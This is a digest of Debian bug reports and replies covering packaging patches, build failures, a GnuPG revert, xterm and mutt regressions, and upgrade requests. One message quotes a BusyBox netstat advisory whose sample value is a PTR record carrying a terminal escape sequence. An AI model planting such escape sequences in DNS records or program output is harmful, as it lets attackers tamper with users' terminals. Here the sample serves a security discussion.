Bug#1010294: libtolua++5.1-dev: unusable for cross compilation

2022-04-27 Thread Helmut Grohne 
Package: libtolua++5.1-dev
Version: 1.0.93-3.1
Tags: patch

libtolua++5.1-dev cannot be used for cross compilation. If you install
it for the host architecture, the tolua++5.1 tool cannot be run. If you
install it for the build architecture, the static library cannot be
linked. Quite fundamentally, for cross building one needs to combine a
build architecture tolua++5.1 converter and a host architecture static
library. Quite obviously, this requirement translates to using different
binary packages for these components. I'm attaching a patch to implement
exactly that. Please consider applying it.

A not so obvious requirement for doing this is that tolua++5.1 actually
behaves in an architecture-independent way. Otherwise, a package
containing it must not be marked Multi-Arch: foreign, which would render
the exercise pointless. I've looked into it and it essentially deals
with text files only, which is a good sign already. Moreover none of the
inputs nor outputs look architecture-dependent in any way to me (which
kinda is expected from source files). So it looks like we're good on
this.

Helmut
diff --minimal -Nru tolua++-1.0.93/debian/changelog 
tolua++-1.0.93/debian/changelog
--- tolua++-1.0.93/debian/changelog 2020-05-20 11:39:04.0 +0200
+++ tolua++-1.0.93/debian/changelog 2022-04-28 06:52:16.0 +0200
@@ -1,3 +1,10 @@
+tolua++ (1.0.93-3.2) UNRELEASED; urgency=medium
+
+  * Non-maintainer upload.
+  * Spit tolua++5.1 into a Multi-Arch: foreign package. (Closes: #-1)
+
+ -- Helmut Grohne   Thu, 28 Apr 2022 06:52:16 +0200
+
 tolua++ (1.0.93-3.1) unstable; urgency=medium
 
   * Non-maintainer upload.
diff --minimal -Nru tolua++-1.0.93/debian/control tolua++-1.0.93/debian/control
--- tolua++-1.0.93/debian/control   2020-05-20 11:36:23.0 +0200
+++ tolua++-1.0.93/debian/control   2022-04-27 19:59:32.0 +0200
@@ -11,7 +11,7 @@
 Package: libtolua++5.1-dev
 Section: libdevel
 Architecture: any
-Depends: liblua5.1-dev, ${misc:Depends}, ${shlibs:Depends}
+Depends: liblua5.1-dev, libtolua++5.1-bin (= ${binary:Version}), 
${misc:Depends}, ${shlibs:Depends}
 Description: extended tool to integrate C/C++ code with Lua (devel)
  tolua++5.1 is an extension of toLua, a tool to integrate C/C++ code with
  Lua. tolua++5.1 includes new features oriented to c++, such as class
@@ -22,3 +22,24 @@
  metamethod facilities, the current version automatically maps C/C++
  constants, external variables, functions, namespace, classes, and methods
  to Lua. It also provides facilities to create Lua modules.
+
+Package: libtolua++5.1-bin
+Section: libdevel
+Architecture: any
+Multi-Arch: foreign
+Depends: ${misc:Depends}, ${shlibs:Depends}
+Breaks: libtolua++5.1-dev (<< 1.0.93-3.2~)
+Replaces: libtolua++5.1-dev (<< 1.0.93-3.2~)
+Description: extended tool to integrate C/C++ code with Lua (tolua++5.1 
converter)
+ tolua++5.1 is an extension of toLua, a tool to integrate C/C++ code with
+ Lua. tolua++5.1 includes new features oriented to c++, such as class
+ templates and is compiled with the newest lua 5.1.
+ .
+ Based on a "cleaned" header file, tolua++ automatically generates
+ the binding code to access C/C++ features from Lua. Using Lua-5.1 API and
+ metamethod facilities, the current version automatically maps C/C++
+ constants, external variables, functions, namespace, classes, and methods
+ to Lua. It also provides facilities to create Lua modules.
+ .
+ This package contains the tolua++5.1 conversion utility. Use
+ libtolua++5.1-dev instead.
diff --minimal -Nru tolua++-1.0.93/debian/doc-base 
tolua++-1.0.93/debian/doc-base
--- tolua++-1.0.93/debian/doc-base  2012-05-09 08:24:15.0 +0200
+++ tolua++-1.0.93/debian/doc-base  1970-01-01 01:00:00.0 +0100
@@ -1,9 +0,0 @@
-Document: tolua++-manual
-Title: toLua++ Reference Manual
-Abstract: This manual describes how to use toLua, a tool to integrate C/C++
- code with Lua.
-Section: Programming
-
-Format: HTML
-Index: /usr/share/doc/libtolua++5.1-dev/index.html
-Files: /usr/share/doc/libtolua++5.1-dev/*.html
diff --minimal -Nru tolua++-1.0.93/debian/docs tolua++-1.0.93/debian/docs
--- tolua++-1.0.93/debian/docs  2010-03-02 23:27:15.0 +0100
+++ tolua++-1.0.93/debian/docs  1970-01-01 01:00:00.0 +0100
@@ -1,4 +0,0 @@
-doc/index.html
-doc/tolua++.html
-doc/toluapp.gif
-README-5.1
diff --minimal -Nru tolua++-1.0.93/debian/libtolua++5.1-bin.install 
tolua++-1.0.93/debian/libtolua++5.1-bin.install
--- tolua++-1.0.93/debian/libtolua++5.1-bin.install 1970-01-01 
01:00:00.0 +0100
+++ tolua++-1.0.93/debian/libtolua++5.1-bin.install 2022-04-28 
06:52:12.0 +0200
@@ -0,0 +1 @@
+usr/bin
diff --minimal -Nru tolua++-1.0.93/debian/libtolua++5.1-bin.manpages 
tolua++-1.0.93/debian/libtolua++5.1-bin.manpages
--- tolua++-1.0.93/debian/libtolua++5.1-bin.manpages1970-01-01 
01:00:00.0 +0100
+++ tolua++-1.0.93/debian/libtolua++5.1-bin.manpages2012-05-09 
08:06:48.0 +0200
@@ -0,0 +1

Bug#1010264: CVE-2022-28391

2022-04-27 Thread Theodore Ts'o 
On Wed, Apr 27, 2022 at 01:55:27PM +0200, Moritz Muehlenhoff wrote:
> Package: e2fsprogs
> Version: 1.46.5-2
> Severity: important
> 
> This issue was found by Alpine:
> https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661
> 
> Details and the patches they used are in the report above, but the
> patches are not yet merged upstream, might be worth to wait until
> that's fixed since the impact is rather low.

Um, going to that link results in the (closed) alpine bug from three
weeks ago:

"netstat is vulnerable to escape sequence injection (busybox)"

"Alpine ships BusyBox with the netstat applet enabled. This is
vulnerable to escape sequence injection when used from an VT
compatible terminal. To exploit this vulnerability the PTR for a
remote host must contain a escape sequence and the victim has to
execute netstat. I've set up an example at [elided] with the PTR
resolving to \027[33\;46mlocalhost."

The string "e2fsprogs" appears nowhere in on the page.

I've done a search on Alpine/aports looking for "e2fsprogs" and could
only find:

e2fsprogs can be uninstalled manually on systems that depend on it
#13584 · created 1 month ago by Álvaro Torralba


updated 1 month ago
modloop verification fails with apline usb drive when local disk partition has 
a alpine installation
#11136 · created 2 years ago by nico

Neither seems to be security related.  Are you sure this was correctly
filed against e2fsprogs?

- Ted

Bug#1010293: Please enable CONFIG_CRYPTO_CRC32C_VPMSUM on ppc64el (and other power)

2022-04-27 Thread Matt Corallo 

Package: src:linux
Version: 5.16.12-1~bpo11+1

Pretty self-explanatory - its set in the upstream ppc64_defconfig, powernv_defconfig, and 
pseries_defconfig but not set in debian.

Bug#1006182: buster-pu: package qtbase-opensource-src/5.11.3+dfsg1-1+deb10u5

2022-04-27 Thread theofficialgman 
Hi I’m that original user that requested the patch.

Do you think you could just go ahead and release it and worry about the
CVEs later as necessary? This bug is quite crippling for some applications.

Bug#1010292: shntool: wrong homepage

2022-04-27 Thread Christoph Anton Mitterer 
Package: shntool
Version: 3.0.10-1+b1
Severity: minor


Hey.

The current homepage (http://etree.org/shnutils/shntool/) seems dead.

Perhaps http://shnutils.freeshell.org/ is the new one, though I haven't
checked whether it's really the "official" one.

At least the upstream author in Debian's copyright file has an email
from the same domain.

Cheers,
Chris.

Bug#1010241: libdebian-source-perl: Incorrect case sensitivity in Debian::Control::Stanza::new for field names

2022-04-27 Thread Alex Muntada 
Hi gregor!

> And then I found the following d/changelog entry for 0.95:
> 
>   [ Alex Muntada ]
>   * Debian::Control::Stanza: accept case-insensitive field names in new()
> as required by Debian Policy while retaining the canonical accessors.
> Thanks to Ben Finney for the bug report. (Closes: #860023)

Wow, I totally forgot that :)

> But yeah, it's not only a déjà-vu, apparently we need to take a look
> at this part of the code again …

Here's a proof of concept:

```
#!perl
use strict;
use warnings;
use v5.30;

use Debian::Control::Stanza::Source;
#use Debian::Control::Stanza::Binary;
my %stanza = (
'Source' => 'package-name',
'VCS-GIT' => 'test-vcs-git',
);
my $s = Debian::Control::Stanza::Source->new(\%stanza);
say $s->Vcs_Git;
```

It works as expected unless you uncomment the use of the
Stanza::Binary package. Then it fails:

```
Invalid field given (VCS_GIT) at case-insensitive.pl line 12.
```

That's because the import in D::C::Stanza is called twice and
the $class->fields is different for ::Source than ::Binary.
I think we need to move the canonicalization to the constructor
instead (see the patch attached, that seems to work and passes
t/Control.t too).

HTH

--
  ⢀⣴⠾⠻⢶⣦⠀
  ⣾⠁⢠⠒⠀⣿⡁   Alex Muntada 
  ⢿⡄⠘⠷⠚⠋   Debian Developer  log.alexm.org
  ⠈⠳⣄

diff --git a/lib/Debian/Control/Stanza.pm b/lib/Debian/Control/Stanza.pm
index f534c19..3be0d2a 100644
--- a/lib/Debian/Control/Stanza.pm
+++ b/lib/Debian/Control/Stanza.pm
@@ -63,12 +63,6 @@ my %canonical;
 sub import {
 my( $class ) = @_;
 
-# map the accessor name for the lower case equivalent
-%canonical = map (
-( lc($_) => $_ ),
-$class->fields,
-);
-
 $class->mk_accessors( $class->fields );
 }
 
@@ -99,6 +93,12 @@ sub new {
 my $class = shift;
 my $init = shift || {};
 
+# map the accessor name for the lower case equivalent
+my %canonical = map (
+( lc($_) => $_ ),
+$class->fields,
+);
+
 my $self = Tie::IxHash->new;
 
 bless $self, $class;


signature.asc
Description: PGP signature

Bug#1010291: postgresql-common: Does /var/log/postgresql really need chmod +t?

2022-04-27 Thread Ross Vandegrift 
Package: postgresql-common
Version: 240
Severity: minor

Hello,

/var/log/postgresql has the sticky bit set, starting I think with
bullseye:

  # ls -lad /var/log/postgresql/
  drwxrwxr-t 2 root postgres 4096 Apr 27 23:11 /var/log/postgresql/

This causes some pain with file-based backups.  In particular, `rsync -a
--inplace` is affected.  Since the dir is sticky, rsync makes the backup
dir sticky.  But since the files are not owned by root on the backup
target, even root will be prevented from overwriting them.  A more
careful explanation can be found at [1].

Is the sticky bit really necessary here?  I've worked around this with
dpkg-statoverride, but I don't understand why this dir is +t anyhow.

Thanks,
Ross

[1] 
https://superuser.com/questions/1708317/rsync-permissions-errors-at-destination-even-though-root-possibly-due-to-sticky


-- System Information:
Debian Release: 11.3
  APT prefers stable-security
  APT policy: (500, 'stable-security'), (500, 'stable'), (40, 'unstable'), (30, 
'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 5.16.0 (SMP w/8 CPU threads; PREEMPT)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages postgresql-common depends on:
ii  adduser   3.118
ii  debconf [debconf-2.0] 1.5.77
ii  libjson-perl  4.03000-1
ii  lsb-base  11.1.0
ii  perl  5.32.1-4+deb11u2
pn  postgresql-client-common  
ii  ssl-cert  1.1.0+nmu1
ii  ucf   3.0043

Versions of packages postgresql-common recommends:
ii  e2fsprogs  1.46.2-2
ii  logrotate  3.18.0-2

Versions of packages postgresql-common suggests:
ii  libjson-perl  4.03000-1

Bug#1010290: nmu: libtsm_4.0.2-0.1

2022-04-27 Thread Victor Westerhuis 
Package: release.debian.org
Severity: normal
User: release.debian@packages.debian.org
Usertags: binnmu

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Hi!

libtsm cannot migrate unless it's rebuilt on buildd. There are no arch:all 
packages, so this should give no problems.

nmu libtsm_4.0.2-0.1 . i386 . unstable . -m "Rebuild on buildd"


-BEGIN PGP SIGNATURE-

iQJHBAEBCAAxFiEE6OxII3T+o0Ujs6ECQz2Rq5dHQPsFAmJpxHUTHHZpY3RvckB3
ZXN0ZXJodS5pcwAKCRBDPZGrl0dA++dAD/9U4RVLm3HRaWQqWvG/JpsAkhWepUrg
LeHCX2yxI0LVbmw19Vs4Cu7S1RlRLtP+1KLoHHvJA2QAoGWPXvxCuejCOGyA6nRH
vvZUoiRbUnarvhQwKl8hC2AcccSlbIVyskgU6VyK/qaj4yYiK51XDMdHSFTEvr9W
w1LYaicnhJw6TRWGI34UK2WQ2et9qMOBdEy3m43jKwfFjJX7pXBYziqthGDY1xd8
4dLN8BGpSGwcqONcW5bkX4fC/Qn0w+jXD47uVx9g8nr7uIDowafP4tf9Q+KZzx9R
ZJQNkZNe6X/VE5HhkjH03ttFdkYpBxquOErNtCco029rUWtHBfZG4+oDxOisiC3h
9JHdg2f2h0/5wpFtfVJ/caBMstBIcxzXvOMxfei5lCX0YZWChTyAWtNoHaaFj8yr
tHv8htT4C6j9JbyepvnUAQqAQ8Bb3zSqkP+eOiyasbHqbcydi2apdUmiuAeNSqq8
DDjCXhjipcW9ntDiT5pc4//Y85rn2if9Z4yMGPXgN8BFAm+TJ+r9ClMwMzOwDBYF
ONce4Zf/8pyKxLEwt1JiFRKAIaAi10c8y3lobziAddlhQKy+F3Nm+XcdDQRpseII
fg5xJ+ochuraavhtbdohlF5IMP0Asrt968iYJcpO5oqLN005avPX57GlkipjdgO+
9tjphYjyrW/jVw==
=rMkL
-END PGP SIGNATURE-

Bug#1010289: audit: FTBFS: error: cast specifies array type

2022-04-27 Thread Daniel Schepler 
Source: audit
Version: 1:3.0.7-1
Severity: serious

>From my build log:

...
Making all in python3
make[6]: Entering directory
'/home/tmpbuilder/cross-i386/audit/audit-3.0.7/debian/build/bindings/swig/python3'
swig -o audit_wrap.c -python -py3 -modern -I. -I../../..
-I../../../../../lib -I/usr/include/python3.10
-I/usr/include/python3.10
../../../../../bindings/swig/python3/../src/auditswig.i
Deprecated command line option: -modern. This option is now always on.
/bin/bash ../../../libtool  --tag=CC   --mode=compile gcc
-DHAVE_CONFIG_H -I. -I../../../../../bindings/swig/python3 -I../../..
-I. -I../../.. -I../../../../../lib -I/usr/include/python3.10
-I/usr/include/python3.10 -Wdate-time -D_FORT
IFY_SOURCE=2 -shared -g -O2
-ffile-prefix-map=/home/tmpbuilder/cross-i386/audit/audit-3.0.7=.
-fstack-protector-strong -Wformat -Werror=format-security -c -o
_audit_la-audit_wrap.lo `test -f 'audit_wrap.c' || echo
'../../../../../bindin
gs/swig/python3/'`audit_wrap.c
libtool: compile:  gcc -DHAVE_CONFIG_H -I.
-I../../../../../bindings/swig/python3 -I../../.. -I. -I../../..
-I../../../../../lib -I/usr/include/python3.10
-I/usr/include/python3.10 -Wdate-time -D_FORTIFY_SOURCE=2 -g -O2
-ffile-prefix-ma
p=/home/tmpbuilder/cross-i386/audit/audit-3.0.7=.
-fstack-protector-strong -Wformat -Werror=format-security -c
audit_wrap.c  -fPIC -DPIC -o .libs/_audit_la-audit_wrap.o
audit_wrap.c: In function '_wrap_audit_rule_data_buf_set':
audit_wrap.c:4701:17: error: cast specifies array type
4701 | arg1->buf = (char [])(char
*)memcpy(malloc((size)*sizeof(char)), (const char *)(arg2),
sizeof(char)*(size));
 | ^
audit_wrap.c:4701:15: error: invalid use of flexible array member
4701 | arg1->buf = (char [])(char
*)memcpy(malloc((size)*sizeof(char)), (const char *)(arg2),
sizeof(char)*(size));
 |   ^
audit_wrap.c:4703:15: error: invalid use of flexible array member
4703 | arg1->buf = 0;
 |   ^
make[6]: *** [Makefile:518: _audit_la-audit_wrap.lo] Error 1
make[6]: Leaving directory
'/home/tmpbuilder/cross-i386/audit/audit-3.0.7/debian/build/bindings/swig/python3'
make[5]: *** [Makefile:417: all-recursive] Error 1
make[5]: Leaving directory
'/home/tmpbuilder/cross-i386/audit/audit-3.0.7/debian/build/bindings/swig'
make[4]: *** [Makefile:414: all-recursive] Error 1
make[4]: Leaving directory
'/home/tmpbuilder/cross-i386/audit/audit-3.0.7/debian/build/bindings'
make[3]: *** [Makefile:471: all-recursive] Error 1
make[3]: Leaving directory
'/home/tmpbuilder/cross-i386/audit/audit-3.0.7/debian/build'
make[2]: *** [Makefile:403: all] Error 2
make[2]: Leaving directory
'/home/tmpbuilder/cross-i386/audit/audit-3.0.7/debian/build'
dh_auto_build: error: cd debian/build && make -j8 returned exit code 2
make[1]: *** [debian/rules:64: debian/build-python-stamp] Error 2
make[1]: Leaving directory '/home/tmpbuilder/cross-i386/audit/audit-3.0.7'
make: *** [debian/rules:34: build-arch] Error 2
dpkg-buildpackage: error: debian/rules build-arch subprocess returned
exit status 2

Looking at the situation a bit, it seems that a recent update to
/usr/include/linux/audit.h made a change such that struct
audit_rule_data is no longer swig friendly.
-- 
Daniel Schepler

Bug#1010288: 'Rotate' rotates entire image regardless of layer or selection.

2022-04-27 Thread Ray Dillinger 
package: gimp
Version: 2.10.30-1+b1
Severity: Normal

The 'rotate' tool in GIMP is now ignoring selection area and layer
restrictions, making it impossible to rotate any part of the image
relative to other parts.

Note, there is a workaround.  Cut to the last paragraph if that's all
you're interested in.

I opened gimp with the intention of creating printable specialized graph
paper with a triangular grid.  So I made a transparent layer and used
'snap to grid' to precisely draw and paste a set of exactly parallel lines.

I intended to paste two more copies of this set of lines, at 60- and
120-degree rotations, to make the triangular grid. So I did select all,
copy, paste, grab the rotation tool to rotate the pasted layer.

When I attempted to use it, it rotated the entire image, including the
layer boundaries of the base layer and the horizontal-lines layer. So I
control-Z undid that, made sure I had selected the pasted layer, and
tried again.  Same result. 

I supposed maybe rotate had been changed and no longer worked on
"pasted" layers for some reason, so I transformed the pasted layer into
a normal layer.  I made sure I had selected that layer and tried again. 
Same result.

I thought maybe they changed rotate so it only works on explicit
selected areas, so I made sure to select all, on that layer, and tried
again.  Same result.

Just to see whether it mattered how the selection was made, I selected
"most" of the area with the wrecked-angle select tool leaving about 5
pixels around the edges unselected, and tried again.  Same result.

At this point I concluded that it is not possible to rotate any part of
the image relative to any other in normal use.

As a workaround I rotated the entire image, exported a .png file, then
rotated it again and exported another .png file.  Then I opened those
images as separate buffers, and cut and pasted from them into my main
buffer.  Note, when doing this make sure the alpha channel for
transparency is preserved in the export options.

Hope this helps!

Bear

Bug#1010287: libnet-ssleay-perl: FTBFS: bad line in substvars file debian/libnet-ssleay-perl.substvars at line 2

2022-04-27 Thread Daniel Schepler 
Source: libnet-ssleay-perl
Version: 1.92-1
Severity: serious

>From my build log:

...
  dh_installdocs -a
  dh_installchangelogs -a
  dh_installexamples -a
  dh_installman -a
  dh_perl -a
  dh_perl_openssl -a
  dh_link -a
  dh_strip_nondeterminism -a
  dh_compress -a
  dh_fixperms -a
  dh_missing -a
  dh_dwz -a
  dh_strip -a
  dh_makeshlibs -a
  dh_shlibdeps -a
dpkg-shlibdeps: error: bad line in substvars file
debian/libnet-ssleay-perl.substvars at line 2
dh_shlibdeps: error: dpkg-shlibdeps
-Tdebian/libnet-ssleay-perl.substvars
debian/libnet-ssleay-perl/usr/lib/x86_64-linux-gnu/perl5/5.34/auto/Net/SSLeay/SSLeay.so
returned exit code 255
dh_shlibdeps: error: Aborting due to earlier error
make: *** [debian/rules:6: binary-arch] Error 2
dpkg-buildpackage: error: debian/rules binary-arch subprocess returned
exit status 2

Looking at the file it's complaining about,
debian/libnet-ssleay-perl.substvars contains:

perl:Depends=perl, perl-openssl-abi-1.1
, perlapi-5.34.0

(My best guess would be that this is a bug in perl-openssl-defaults /
dh_perl_openssl, but it's just a guess...)
-- 
Daniel Schepler

Bug#632570: fails to join RFC 2231 continuations

2022-04-27 Thread Kevin J. McCarthy 

On Mon, 13 Dec 2021 19:34:21 -0800 "Kevin J. McCarthy"  wrote:

I believe this was fixed in Mutt 1.6.0, and this ticket can be closed.


Again, this bug should be close-able.  Thank you!

-Kevin


signature.asc
Description: PGP signature

Bug#1010270: Recent update break xterm

2022-04-27 Thread Thomas Dickey 
On Wed, Apr 27, 2022 at 08:28:48PM +0200, Sven Joachim wrote:
> Control: reassign -1 ncurses-base 6.3+20220423-1
> 
> Please keep the bug report CC'ed.
> 
> Am 27.04.2022 um 18:25 schrieb Klaus Ethgen:
> 
> > Am Mi den 27. Apr 2022 um 15:49 schrieb Sven Joachim:
> >> > Package: libtinfo5
> >> > Version: 6.3+20220423-1
> >> > Severity: normal
> >> >
> >> > Since the last update of this package, applications running inside of
> >> > xterm are not always able to update the window title.
> >> >
> >> > Instead, control output are breaking the layout of the application.
> >> >
> >> > Broken Applications:
> >> > - mutt
> >> > - cmus
> >> >
> >> > Still working:
> >> > - zsh
> >>
> >> Can you give steps to reproduce what is broken?  Also, which version of
> >> xterm do you use, and what is the value of the TERM environment
> >> variable?
> >
> > ~> dpkg -l xterm
> > ii  xterm  372-1amd64X terminal emulator
> > ~> echo $TERM
> > xterm-256color
> >
> > For cmus, just use it, it should show the title of the current song in
> > the title of your terminal.
> >
> > Same for mutt. It should show the message count in title ans some more
> > infomations.
> 
> Not in its default configuration, you need to have "set ts_enabled=yes"
> in your muttrc file.  With that I can confirm the problem.
> 
> Two workarounds: set TERM=xterm-p370, _or_ downgrade ncurses-base to
> 6.3-2, I recommend the latter.

hmm - for consistency in xterm, I should have made the default for

  --enable-status-line
 
enabled.  But since there are few actual uses of tsl/fsl (almost all are
hard-coded), I'd overlooked those which mix hard-coding and terminfo
(such as the programs given as examples here).

Applications which assume xterm's title-string should use the terminfo
"XT" flag anyway (documented in terminfo.src), because it doesn't allow
for a parameter in tsl, as documented in terminfo(5):

  to_status_line  tsl   ts move to status line,
   column #1

   Some terminals with status lines need special sequences to  access  the
   status  line.  These may be expressed as a string with single parameter
   tsl which takes the cursor to a given zero-origin column on the  status
   line.   The  capability fsl must return to the main-screen cursor posi‐
   tions before the last tsl.  You may need to embed the string values  of
   sc  (save  cursor) and rc (restore cursor) in tsl and fsl to accomplish
   this.

-- 
Thomas E. Dickey 
https://invisible-island.net
ftp://ftp.invisible-island.net


signature.asc
Description: PGP signature

Bug#1009791: mutt: change-folder no longer selects next folder with new mail

2022-04-27 Thread Kevin J. McCarthy 

On Sun, 17 Apr 2022 14:20:54 -0600 Bob Proulx  wrote:

Starting with 2.2.3-1 the 'c' change-folder action now prompts with
the *previous folder always* and never prompts with any other folders.
It no longer selects a mailboxes folder with new mail.  It prompts
with the previous folder even if no new mail has arrived there.
Effectively creating a situation where one toggles between two folders
endlessly.


Bob, what type of mailbox are you using (Maildir, mbox, IMAP...)

What do your `mailboxes` lines in your muttrc look like?  Do they have a 
trailing slash?  If so, does the problem go away if you remove the 
trailing slash?


One change in 2.2.x was normalizing Maildir paths when opening them (as
IMAP does) - removing a trailing delimiter.  This might cause the
behavior you are describing.

-Kevin

Bug#1006149: linux-image-5.16.0-1-686: Fails to boot on T41 Thinkpads

2022-04-27 Thread Francesco C 
Hi ,

5.16 series is EOL so I've just continued to do tests with vanilla
linux-5.17.4 and linux-5.17.5 : both do not boot and stop at the same
point as indicated in the messages above _but_ ... something strange
is happening also with longterm 5.15 series since version 5.15.35 and
5.15.36 do not boot too.

The kernels are both custom but the config for both versions is
exactly the same.

The following lines are the last ones appearing over the screen :

[3.736342] ima: No TPM chip found, activating TPM-bypass!
[3.736360] ima: Allocated hash algorithm: sha512
[3.736401] ima: No architecture policies found
[3.736429] evm: Initialising EVM extended attributes:
[3.736431] evm: security.selinux
[3.736433] evm: security.SMACK64 (disabled)
[3.736435] evm: security.SMACK64EXEC (disabled)
[3.736437] evm: security.SMACK64TRANSMUTE (disabled)
[3.736438] evm: security.SMACK64MMAP (disabled)
[3.736440] evm: security.apparmor
[3.736442] evm: security.ima
[3.736443] evm: security.capability
[3.736445] evm: HMAC attrs: 0x1<-- They stop booting here

Not the same point as in 5.16 and 5.17 cases , but with the same result.

So at the moment , at least in my case , the last working kernel is
version 5.15.34

Bug#1004922: Asking for new upstream release

2022-04-27 Thread Victor Westerhuis 
I have retracted the current version of kmscon I had uploaded at 
mentors.debian.net to ask the upstream maintainer for a new release 
(https://github.com/Aetf/kmscon/issues/42), so I can prepare a proper 
release for Debian.


A new version of libtsm has just been accepted into the archive, closing 
the blocking bug #1004921, so there should be no further blocks once I 
get a new version of kmscon ready.

--
Victor Westerhuis 


OpenPGP_signature
Description: OpenPGP digital signature

Bug#1010171: sbuild's "unshare" test fails with gpg-agent 2.2.34-1

2022-04-27 Thread Daniel Kahn Gillmor 
Control: reopen 1010171
Control: reassign 1010171 src:gnupg2 2.2.34-1
Control: affects 1010171 + sbuild
Control: tags 1010171 + patch
Control: forwarded 1010171 https://dev.gnupg.org/T5953

I've tracked this problem down to a change in upstream that was intended
to accomodate non-standards-compliant secret key material.

I'm going to revert that change in debian (using the attached patch)
until we can figure out how to support both existing,
standards-compliant key material and the "SOS"-formatted secret keys.

The change made to sbuild (supplying --batch for key import) is still
the right change to make, but it was insufficient to resolve the
problem.

--dkg

From a86a3026218c2d5ac7cd898666b8ef60a5734bb9 Mon Sep 17 00:00:00 2001
From: Daniel Kahn Gillmor 
Date: Wed, 27 Apr 2022 16:57:28 -0400
Subject: [PATCH] gpg: import Ed25519 private keys as MPIs

* g10/parse-packet.c (parse_key): Use mpi_read for Ed25519 private
  key.

--

This functionally reverts 14de7b1e5904e78fcbe413a82d0f19b750bd8830,
because it caused breakage with sbuild's continuous integration
testing, which uses gpg via debsign (see
https://bugs.debian.org/1010171)

In particular, it fixes the use of the following two commands with an
unencrypted Ed25519 secret key where the full 256-bits are used in the
secret scalar:

gpg --allow-secret-key-import --import
gpg --batch --detach-sign

I guess this also unfortunately breaks importing "SOS"-formatted
secret keys as a byproduct, though I don't fully understand the
mechanism.

The upstream test suite should probably be updated to include samples
of each of these flavors of secret key material, and ensure that they
can be imported and used directly.
---
 g10/parse-packet.c | 5 +
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/g10/parse-packet.c b/g10/parse-packet.c
index 6a529707a..7eb2d03b0 100644
--- a/g10/parse-packet.c
+++ b/g10/parse-packet.c
@@ -2805,10 +2805,7 @@ parse_key (IOBUF inp, int pkttype, unsigned long pktlen,
   goto leave;
 }
   n = pktlen;
-  if (algorithm == PUBKEY_ALGO_EDDSA)
-pk->pkey[i] = sos_read (inp, , 0);
-  else
-pk->pkey[i] = mpi_read (inp, , 0);
+  pk->pkey[i] = mpi_read (inp, , 0);
   pktlen -= n;
   if (list_mode)
 {
-- 
2.35.1



signature.asc
Description: PGP signature

Bug#1010286: please package new upstream release

2022-04-27 Thread Antoine Beaupre 
Package: ruby-moneta
Version: 1.0.0-9
Severity: wishlist

This is needed to ship the newer Trocla release (0.4.0) and possibly
other dependencies.

I'll see if I can work on this myself shortly as part of the ruby
team.

Thanks!


-- System Information:
Debian Release: 11.3
  APT prefers stable-security
  APT policy: (500, 'stable-security'), (500, 'stable-debug'), (500, 'stable'), 
(1, 'unstable'), (1, 'testing')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 5.10.0-13-amd64 (SMP w/4 CPU threads)
Kernel taint flags: TAINT_FIRMWARE_WORKAROUND
Locale: LANG=fr_CA.UTF-8, LC_CTYPE=fr_CA.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages ruby-moneta depends on:
ii  ruby  1:2.7+2

ruby-moneta recommends no packages.

Versions of packages ruby-moneta suggests:
pn  ruby-activerecord  
ii  ruby-fog-core  2.1.0-3.1
ii  ruby-multi-json1.14.1-1
pn  ruby-rack  
pn  ruby-rack-cache
pn  ruby-sequel
ii  ruby-sqlite3   1.4.2-3
pn  ruby-tokyocabinet  

-- no debconf information

Bug#1010285: thunar: New upstream development version (4.17.8) available

2022-04-27 Thread Andrew Chadwick 
Package: thunar
Version: 4.17.7-1
Severity: wishlist
X-Debbugs-Cc: a.t.chadw...@gmail.com

Hi there. A new upstream development version of Thunar is available:

https://gitlab.xfce.org/xfce/thunar/-/tags/thunar-4.17.8

This version adds a number of useful features that could probably use a bit 
of wider user testing, including recursive search and a graphical shortcuts 
editor.

Please can you consider packaging it in experimental, replacing 4.17.7?


thanks,
Andrew

-- System Information:
Debian Release: bookworm/sid
  APT prefers testing
  APT policy: (900, 'testing'), (5, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 5.16.0-6-amd64 (SMP w/8 CPU threads; PREEMPT)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8), 
LANGUAGE=en_GB:en
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages thunar depends on:
ii  desktop-file-utils   0.26-1
ii  exo-utils4.17.1-1
ii  libatk1.0-0  2.38.0-1
ii  libc62.33-7
ii  libcairo21.16.0-5
ii  libexo-2-0   4.17.1-1
ii  libgdk-pixbuf-2.0-0  2.42.8+dfsg-1
ii  libglib2.0-0 2.72.1-1
ii  libgtk-3-0   3.24.33-1
ii  libgudev-1.0-0   237-2
ii  libice6  2:1.0.10-1
ii  libnotify4   0.7.9-3
ii  libpango-1.0-0   1.50.6+ds-2
ii  libsm6   2:1.2.3-1
ii  libthunarx-3-0   4.17.7-1
ii  libxfce4ui-2-0   4.17.3-1
ii  libxfce4util74.17.1-1
ii  libxfconf-0-34.16.0-2
ii  shared-mime-info 2.1-2
ii  thunar-data  4.17.7-1

Versions of packages thunar recommends:
ii  dbus-user-session [default-dbus-session-bus]  1.14.0-1
ii  dbus-x11 [dbus-session-bus]   1.14.0-1
ii  gnome-shell [polkit-1-auth-agent] 42.0-4
ii  gvfs  1.50.0-1
ii  libxfce4panel-2.0-4   4.16.3-1
ii  policykit-1-gnome [polkit-1-auth-agent]   0.105-7+b1
ii  polkit-kde-agent-1 [polkit-1-auth-agent]  4:5.24.4-1
ii  thunar-volman 4.16.0-1
ii  tumbler   4.16.0-1
ii  udisks2   2.9.4-1
ii  xdg-user-dirs 0.17-2

Versions of packages thunar suggests:
ii  gvfs-backends 1.50.0-1
pn  thunar-archive-plugin 
pn  thunar-media-tags-plugin  

-- no debconf information

Bug#1010148: openmsx: patch for ftbfs on riscv64

2022-04-27 Thread Manuel Bilderbeek 
FYI, this has been already fixed upstream and the next release will 
incorporate the fix. It is expected within a few weeks.


Op 25-04-2022 om 13:07 schreef Bo YU:

Package: openmsx
Version: 17.0-2
